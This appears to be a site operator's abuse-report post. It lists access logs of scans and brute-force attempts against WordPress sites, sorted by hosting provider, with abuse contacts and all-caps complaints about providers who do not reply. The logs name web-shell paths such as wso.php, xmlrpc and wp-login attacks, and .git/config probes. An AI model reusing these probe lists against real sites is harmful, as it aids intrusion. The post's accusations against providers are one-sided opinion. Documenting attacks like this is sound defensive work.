abuse@contabo.de – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
194.233.77.5 website*x.com – – [30/Aug/2025:17:03:32 +0200] „GET /wp-includes/ID3/license.txt HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
194.233.77.5 website*x.com – – [30/Aug/2025:17:03:33 +0200] „GET /feed/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
194.233.77.5 website*x.com – – [30/Aug/2025:17:03:33 +0200] „GET /xmlrpc.php?rsd HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
194.233.77.5 website*x.com – – [30/Aug/2025:17:03:33 +0200] „GET /blog/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
194.233.77.5 website*x.com – – [30/Aug/2025:17:03:33 +0200] „GET /web/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
194.233.77.5 website*x.com – – [30/Aug/2025:17:03:34 +0200] „GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
194.233.77.5 website*x.com – – [30/Aug/2025:17:03:34 +0200] „GET /wp/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
194.233.77.5 website*x.com – – [30/Aug/2025:17:03:34 +0200] „GET /2020/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
194.233.77.5 website*x.com – – [30/Aug/2025:17:03:34 +0200] „GET /2019/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
194.233.77.5 website*x.com – – [30/Aug/2025:17:03:35 +0200] „GET /2021/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
194.233.77.5 website*x.com – – [30/Aug/2025:17:03:35 +0200] „GET /shop/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
194.233.77.5 website*x.com – – [30/Aug/2025:17:03:35 +0200] „GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
194.233.77.5 website*x.com – – [30/Aug/2025:17:03:35 +0200] „GET /test/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
194.233.77.5 website*x.com – – [30/Aug/2025:17:03:36 +0200] „GET /site/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
194.233.77.5 website*x.com – – [30/Aug/2025:17:03:36 +0200] „GET /cms/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“

SUNDAY!

MAIL NR. 18 TODAY!
abuse@microsoft.com,msftcs@microsoft.com,cert@microsoft.com,abuse-sponsor@inferno.net.uk,abuse@hostinode.com,admin@serveroffer.lt, info@serveroffer.lt, support@serveroffer.lt
AS8075 – Microsoft Corporation – AGAIN AND AGAIN EVERY DAY!!! – VERY UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@microsoft.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT! ABUSE PER EMAIL IS STANDARD!!!
20.41.82.205 website*x.com – – [31/Aug/2025:05:10:57 +0200] „GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.0“ 403 – „-“ „-“
20.41.82.205 website*x.com – – [31/Aug/2025:05:10:57 +0200] „GET /admin.php HTTP/1.0“ 302 – „-“ „-“
20.41.82.205 website*x.com – – [31/Aug/2025:05:11:02 +0200] „GET /simple.php HTTP/1.0“ 302 – „-“ „-“
20.41.82.205 website*x.com – – [31/Aug/2025:05:11:03 +0200] „GET /css.php HTTP/1.0“ 403 – „-“ „-“
20.41.82.205 website*x.com – – [31/Aug/2025:05:11:03 +0200] „GET /fm.php?p= HTTP/1.0“ 302 – „-“ „-“
20.41.82.205 website*x.com – – [31/Aug/2025:05:11:05 +0200] „GET /autoload_classmap.php?p= HTTP/1.0“ 302 – „-“ „-“
20.41.82.205 website*x.com – – [31/Aug/2025:05:11:06 +0200] „GET /byp.php HTTP/1.0“ 302 – „-“ „-“
20.41.82.205 website*x.com – – [31/Aug/2025:05:11:07 +0200] „GET /index/function.php HTTP/1.0“ 403 – „-“ „-“
20.41.82.205 website*x.com – – [31/Aug/2025:05:11:07 +0200] „GET /f.php HTTP/1.0“ 302 – „-“ „-“
20.41.82.205 website*x.com – – [31/Aug/2025:05:11:09 +0200] „GET /makeasmtp.php?p= HTTP/1.0“ 302 – „-“ „-“
20.41.82.205 website*x.com – – [31/Aug/2025:05:11:10 +0200] „GET /cong.php HTTP/1.0“ 302 – „-“ „-“
20.41.82.205 website*x.com – – [31/Aug/2025:05:11:11 +0200] „GET /file.php? HTTP/1.0“ 302 – „-“ „-“
20.41.82.205 website*x.com – – [31/Aug/2025:05:11:12 +0200] „GET /manager.php?p= HTTP/1.0“ 302 – „-“ „-“
20.41.82.205 website*x.com – – [31/Aug/2025:05:11:14 +0200] „GET /moon.php= HTTP/1.0“ 403 – „-“ „-“
20.41.82.205 website*x.com – – [31/Aug/2025:05:11:14 +0200] „GET /as.php HTTP/1.0“ 302 – „-“ „-“
20.41.82.205 website*x.com – – [31/Aug/2025:05:11:15 +0200] „GET /goods.php HTTP/1.0“ 302 – „-“ „-“
20.41.82.205 website*x.com – – [31/Aug/2025:05:11:16 +0200] „GET /0.php HTTP/1.0“ 302 – „-“ „-“
20.41.82.205 website*x.com – – [31/Aug/2025:05:11:17 +0200] „GET /m.php HTTP/1.0“ 302 – „-“ „-“
20.41.82.205 website*x.com – – [31/Aug/2025:05:11:19 +0200] „GET /star.php HTTP/1.0“ 302 – „-“ „-“
20.41.82.205 website*x.com – – [31/Aug/2025:05:11:20 +0200] „GET /wso.php HTTP/1.0“ 302 – „-“ „-“
20.41.82.205 website*x.com – – [31/Aug/2025:05:11:21 +0200] „GET /11.php HTTP/1.0“ 302 – „-“ „-“
20.41.82.205 website*x.com – – [31/Aug/2025:05:11:22 +0200] „GET /mail.php HTTP/1.0“ 302 – „-“ „-“
20.41.82.205 website*x.com – – [31/Aug/2025:05:11:23 +0200] „GET /about.php HTTP/1.0“ 302 – „-“ „-“
20.41.82.205 website*x.com – – [31/Aug/2025:05:11:24 +0200] „GET /f35.php HTTP/1.0“ 302 – „-“ „-“
20.41.82.205 website*x.com – – [31/Aug/2025:05:11:26 +0200] „GET /goto.php HTTP/1.0“ 302 – „-“ „-“
20.41.82.205 website*x.com – – [31/Aug/2025:05:11:27 +0200] „GET /a3.php HTTP/1.0“ 302 – „-“ „-“
20.41.82.205 website*x.com – – [31/Aug/2025:05:11:28 +0200] „GET /radio.php HTTP/1.0“ 302 – „-“ „-“
20.41.82.205 website*x.com – – [31/Aug/2025:05:11:29 +0200] „GET /new.php HTTP/1.0“ 302 – „-“ „-“
20.41.82.205 website*x.com – – [31/Aug/2025:05:11:31 +0200] „GET /10.php HTTP/1.0“ 302 – „-“ „-“
20.41.82.205 website*x.com – – [31/Aug/2025:05:11:32 +0200] „GET /ay.php HTTP/1.0“ 302 – „-“ „-“
20.41.82.205 website*x.com – – [31/Aug/2025:05:11:33 +0200] „GET /00.php HTTP/1.0“ 302 – „-“ „-“
20.41.82.205 website*x.com – – [31/Aug/2025:05:11:34 +0200] „GET /2.php HTTP/1.0“ 302 – „-“ „-“
20.41.82.205 website*x.com – – [31/Aug/2025:05:11:35 +0200] „GET /jp.php HTTP/1.0“ 302 – „-“ „-“
20.41.82.205 website*x.com – – [31/Aug/2025:05:11:37 +0200] „GET /3.php HTTP/1.0“ 302 – „-“ „-“
20.41.82.205 website*x.com – – [31/Aug/2025:05:11:38 +0200] „GET /403.php HTTP/1.0“ 302 – „-“ „-“
20.41.82.205 website*x.com – – [31/Aug/2025:05:11:39 +0200] „GET /moon.php?p= HTTP/1.0“ 403 – „-“ „-“
… and so on… and so on!!!
AS216099 – EMRE ANIL ARSLAN – IS NOW COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse-sponsor@inferno.net.uk,abuse@hostinode.com
2a0f:85c1:b3c:1:fdb6:b70f:288e:f102 website*x.com – – [31/Aug/2025:05:40:07 +0200] „GET /assets/images/accesson.php HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0“
2a0f:85c1:b3c:1:fdb6:b70f:288e:f102 website*x.com – – [31/Aug/2025:05:40:11 +0200] „GET /accesson.php HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0“
AS209605 – UAB Host Baltic – AGAIN AND AGAIN EVERY DAY!!! – VERY UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
admin@serveroffer.lt – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
141.98.11.169 website*x.com – – [31/Aug/2025:11:00:44 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://t.co/“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1; rv:119.0) Gecko/20100101 Firefox/119.0“
141.98.11.169 website*x.com – – [31/Aug/2025:11:00:44 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://t.co/“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:118.0) Gecko/20100101 Firefox/118.0“
141.98.11.169 website*x.com – – [31/Aug/2025:11:00:44 +0200] „GET /wp-admin/ HTTP/1.0“ 403 – „https://www.facebook.com/“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15“

MAIL NR. 19 TODAY!
abuse@virtualine.org,
AS214940 – KPROHOST LLC – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@virtualine.org – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
198.55.98.93 website*x.de – – [31/Aug/2025:07:04:15 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; CrOS x86_64 12425.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3877.0 Safari/537.36“
198.55.98.93 website*x.de – – [31/Aug/2025:07:21:46 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14“

MAIL NR. 20 TODAY!
abuse@ovh.net,
AS16276 – OVH SAS – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@ovh.net – ALWAYS ANSWERED IN OUR ABUSE EMAILS!
51.75.157.203 website*x.com – – [31/Aug/2025:10:22:40 +0200] „GET /wp-json/custom/v1/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36“
51.75.157.203 website*x.com – – [31/Aug/2025:10:31:26 +0200] „POST /wp-json/v1/u HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36“

MAIL NR. 21 TODAY!
abuse@transip.nl,abuse@hetzner.com,abuse@godaddy.com,contact@godaddy.com,info@godaddy.com,support@godaddy.com,admin@wirenetchile.com
AS20857 – Signet B.V. – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@transip.nl
2a01:7c8:aac0:5a::1 www.website*x.com – – [31/Aug/2025:09:21:12 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.126 Safari/537.36 Edg/113.0.1774.50“
2a01:7c8:aac0:5a::1 www.website*x.com – – [31/Aug/2025:09:21:12 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36“
AS24940 – Hetzner Online GmbH – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@hetzner.com – ALWAYS ANSWERED IN OUR ABUSE EMAILS! VERY GOOD PROVIDER!
2a01:4f8:1c1c:f5b0::1 www.website*x.com – – [31/Aug/2025:09:26:10 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:128.0) Gecko/20100101 Firefox/128.0“
2a01:4f8:1c1c:f5b0::1 www.website*x.com – – [31/Aug/2025:09:26:10 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36“
AS26496 – GoDaddy.com, LLC – VERY IGNORANT PROVIDER! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
HERE WITH 6 IP´S! – VERY UNSECURE PROVIDER!
abuse@godaddy.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT! ABUSE PER EMAIL IS STANDARD!!!
208.109.41.227 www.website*x.com – – [31/Aug/2025:09:35:29 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.126 Safari/537.36 Edg/113.0.1774.50“
208.109.41.227 www.website*x.com – – [31/Aug/2025:09:35:30 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:126.0) Gecko/20100101 Firefox/126.0“
+
107.180.112.229 www.website*x.com – – [31/Aug/2025:10:04:59 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36“
107.180.112.229 www.website*x.com – – [31/Aug/2025:10:05:00 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36“
+
132.148.176.148 www.website*x.com – – [31/Aug/2025:10:14:43 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:129.0) Gecko/20100101 Firefox/129.0“
132.148.176.148 www.website*x.com – – [31/Aug/2025:10:14:44 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:125.0.1) Gecko/20100101 Firefox/125.0.1“
+
132.148.180.254 www.website*x.com – – [31/Aug/2025:11:32:09 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36“
132.148.180.254 www.website*x.com – – [31/Aug/2025:11:32:09 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36“
+
118.139.178.100 www.website*x.com – – [31/Aug/2025:11:41:58 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:128.0) Gecko/20100101 Firefox/128.0“
118.139.178.100 www.website*x.com – – [31/Aug/2025:11:41:59 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 14.3) AppleWebKit/614.31.14 (KHTML, like Gecko) Version/17.0.96 Safari/614.31.14“
+
107.180.119.59 www.website*x.com – – [31/Aug/2025:12:15:17 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36“
107.180.119.59 www.website*x.com – – [31/Aug/2025:12:15:18 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13.3; rv:126.0) Gecko/20100101 Firefox/126.0“
AS265831 – SOC. COMERCIAL WIRENET CHILE LTDA. – VERY UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
admin@wirenetchile.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
138.117.148.158 www.website*x.com – – [31/Aug/2025:09:40:19 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:126.0) Gecko/20100101 Firefox/126.0“
138.117.148.158 www.website*x.com – – [31/Aug/2025:09:40:20 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:125.0.1) Gecko/20100101 Firefox/125.0.1“

MAIL NR. 22 TODAY!
abuse@worldhost.group,registro@dialhost.com.br,abuse@alibaba-inc.com,abuse@ovh.net
AS141004 – QTIME BUSINESSES PRIVATE LIMITED – VERY UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@worldhost.group – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
103.154.184.211 www.website*x.com – – [31/Aug/2025:09:45:14 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36“
103.154.184.211 www.website*x.com – – [31/Aug/2025:09:45:15 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.126 Safari/537.36 Edg/113.0.1774.50“
AS262448 – DIALHOST INTERNET EIRELI – VERY UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
registro@dialhost.com.br – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
2804:b44:1000::36 www.website*x.com – – [31/Aug/2025:09:55:05 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0“
2804:b44:1000::36 www.website*x.com – – [31/Aug/2025:09:55:06 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36“
AS37963 – Hangzhou Alibaba Advertising Co.,Ltd. – VERY UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@alibaba-inc.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT! ABUSE PER EMAIL IS STANDARD!!!
HERE WITH 2 IP´S!
8.137.149.112 www.website*x.com – – [31/Aug/2025:10:00:03 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13.3; rv:126.0) Gecko/20100101 Firefox/126.0“
8.137.149.112 www.website*x.com – – [31/Aug/2025:10:00:04 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 Edg/112.0.1722.68“
+
114.55.74.90 www.website*x.com – – [31/Aug/2025:12:01:00 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36“
114.55.74.90 www.website*x.com – – [31/Aug/2025:12:01:01 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36 Edg/115.0.1901.203“
AS16276 – OVH SAS – HERE WITH 2 IP´S! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@ovh.net – ALWAYS ANSWERED IN OUR ABUSE EMAILS!
198.244.233.124 www.website*x.com – – [31/Aug/2025:10:09:53 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:127.0) Gecko/20100101 Firefox/127.0“
198.244.233.124 www.website*x.com – – [31/Aug/2025:10:09:53 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36“
+
57.128.47.115 www.website*x.com – – [31/Aug/2025:12:44:35 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0“
57.128.47.115 www.website*x.com – – [31/Aug/2025:12:44:35 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:125.0.1) Gecko/20100101 Firefox/125.0.1“

MAIL NR. 23 TODAY!
IARPOC@Newfold.com,legal@bluehost.com,eig-noc@endurance.com,abuse@orangehost.com,abuse@deninet.hu,registro@dialhost.com.br
AS46606 – Unified Layer – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
IARPOC@Newfold.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
162.240.97.19 www.website*x.com – – [31/Aug/2025:10:19:39 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0“
162.240.97.19 www.website*x.com – – [31/Aug/2025:10:19:39 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36“
AS19853 – OrangeHost – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@orangehost.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
173.252.167.70 www.website*x.com – – [31/Aug/2025:10:24:36 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0“
173.252.167.70 www.website*x.com – – [31/Aug/2025:10:24:37 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36“
AS29278 – Rackhost Zrt. – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@deninet.hu – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
87.229.65.46 www.website*x.com – – [31/Aug/2025:10:29:31 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0“
87.229.65.46 www.website*x.com – – [31/Aug/2025:10:29:31 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36“
87.229.65.46 www.website*x.com – – [31/Aug/2025:10:43:55 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15“
87.229.65.46 www.website*x.com – – [31/Aug/2025:10:43:55 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 14.3) AppleWebKit/614.31.14 (KHTML, like Gecko) Version/17.0.96 Safari/614.31.14“
AS262448 – DIALHOST INTERNET EIRELI – VERY UNSECURE PROVIDER! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
registro@dialhost.com.br – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
2804:b44:1000::35 www.website*x.com – – [31/Aug/2025:10:34:23 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0.1) Gecko/20100101 Firefox/125.0.1“
2804:b44:1000::35 www.website*x.com – – [31/Aug/2025:10:34:23 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0.1) Gecko/20100101 Firefox/125.0.1“
2804:b44:1000::35 www.website*x.com – – [31/Aug/2025:12:39:47 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36“
2804:b44:1000::35 www.website*x.com – – [31/Aug/2025:12:39:47 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13.3; rv:126.0) Gecko/20100101 Firefox/126.0“

MAIL NR. 24 TODAY!
abuse@masterhost.ru,abuse@virtualine.org,abuse@hosteurope.de,abuse@ni.net.tr
AS25532 – LLC „MASTERHOST“ – RUSSIA IS VERY UNWANTED! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
HERE WITH 3 IP´S! VERY UNSECURE PROVIDER!
